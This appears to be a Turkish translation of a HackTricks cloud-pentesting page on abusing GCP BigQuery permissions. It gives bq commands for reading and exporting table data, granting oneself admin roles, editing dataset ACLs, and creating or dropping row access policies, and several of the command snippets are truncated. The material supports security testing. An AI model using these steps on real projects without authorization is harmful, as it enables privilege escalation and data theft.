Bir BigQuery tablosunda saklanan bilgileri okumak, hassas bilgi bulmayı mümkün kılabilir. Bilgilere erişmek için gerekli izinler bigquery.tables.get, bigquery.jobs.create ve bigquery.tables.getData:
BigQuery tablo verilerini okuma
```bash
bq head .
bq query --nouse_legacy_sql 'SELECT * FROM `..` LIMIT 1000'
```
Bu, verilere erişmenin başka bir yoludur. Cloud Storage bucket’ına dışa aktarın ve bilgileri içeren dosyaları indirin. Bu işlemi gerçekleştirmek için aşağıdaki izinler gerekir: bigquery.tables.export, bigquery.jobs.create ve storage.objects.create.
BigQuery tablosunu Cloud Storage'a dışa aktar
```bash
bq extract .
Bir Bigquery tablosuna belirli, güvenilir veriler eklemek, başka bir yerdeki bir zafiyeti kötüye kullanmak için mümkün olabilir. Bu, bigquery.tables.get, bigquery.tables.updateData ve bigquery.jobs.create izinleriyle kolayca yapılabilir:
</details>
### `bigquery.datasets.setIamPolicy`
Bir saldırgan bu ayrıcalığı kötüye kullanarak bir BigQuery dataset üzerinde **kendisine daha fazla izin verebilir**:
<details>
<summary>Set IAM policy on BigQuery dataset</summary>
```bash
# For this you also need bigquery.tables.getIamPolicy
bq add-iam-policy-binding \
--member='user:<email>' \
--role='roles/bigquery.admin' \
<proj>:<dataset>
# use the set-iam-policy if you don't have bigquery.tables.getIamPolicy
Sadece bu izin, kimlerin erişebileceğini belirten ACL’leri değiştirerek BigQuery dataset’i üzerindeki erişiminizi güncellemenize olanak tanır:
BigQuery dataset ACL'lerini güncelle
```bash
# Download current permissions, reqires bigquery.datasets.get
bq show --format=prettyjson : > acl.json
## Give permissions to the desired user
bq update --source acl.json :
## Read it with
bq head $PROJECT_ID:.
Bir saldırgan bu ayrıcalığı kötüye kullanarak bir BigQuery tablosu üzerinde kendine ek izinler verebilir:
BigQuery tablosu üzerinde IAM politikasını ayarla
```bash
# For this you also need bigquery.tables.setIamPolicy
bq add-iam-policy-binding \
--member='user:' \
--role='roles/bigquery.admin' \
:.
</details>
### `bigquery.rowAccessPolicies.update`, `bigquery.rowAccessPolicies.setIamPolicy`, `bigquery.tables.getData`, `bigquery.jobs.create`
Belgelere göre, bahsedilen izinlerle **bir satır erişim politikasını güncellemek** mümkün.\
Ancak, **cli `bq`** kullanırken bazı ek izinlere ihtiyacınız var: **`bigquery.rowAccessPolicies.create`**, **`bigquery.tables.get`**.
<details>
<summary>Satır erişim politikasını oluştur veya değiştir</summary>
```bash
bq query --nouse_legacy_sql 'CREATE OR REPLACE ROW ACCESS POLICY <filter_id> ON `<proj>.<dataset-name>.<table-name>` GRANT TO ("<user:user@email.xyz>") FILTER USING (term = "Cfba");' # A example filter was used
List row access policies
```bash
bq ls --row_access_policies :.
Id Filter Predicate Grantees Creation Time Last Modified Time
apac_filter term = “Cfba” user:asd@hacktricks.xyz 21 Jan 23:32:09 21 Jan 23:32:09
</details>
Eğer **`bigquery.rowAccessPolicies.delete`** iznine sahipseniz, `bigquery.rowAccessPolicies.update` yerine politikayı silebilirsiniz:
<details>
<summary>Satır erişim politikalarını sil</summary>
```bash
# Remove one
bq query --nouse_legacy_sql 'DROP ALL ROW ACCESS POLICY <policy_id> ON `<proj>.<dataset-name>.<table-name>`;'
# Remove all (if it's the last row policy you need to use this
bq query --nouse_legacy_sql 'DROP ALL ROW ACCESS POLICIES ON `<proj>.<dataset-name>.<table-name>`;'
Caution
Satır erişim politikalarını atlatmanın bir başka olası yolu, kısıtlı verilerin değerini değiştirmektir. Eğer sadece term’in Cfba olduğu durumları görebiliyorsanız, tablodaki tüm kayıtları term = "Cfba" olacak şekilde değiştirebilirsiniz. Ancak bu, bigquery tarafından engellenir.
HackTricks CloudHackTricks Training AWS Red Team Expert (ARTE)
HackTricks Training GCP Red Team Expert (GRTE)
HackTricks Training Azure Red Team Expert (AzRTE)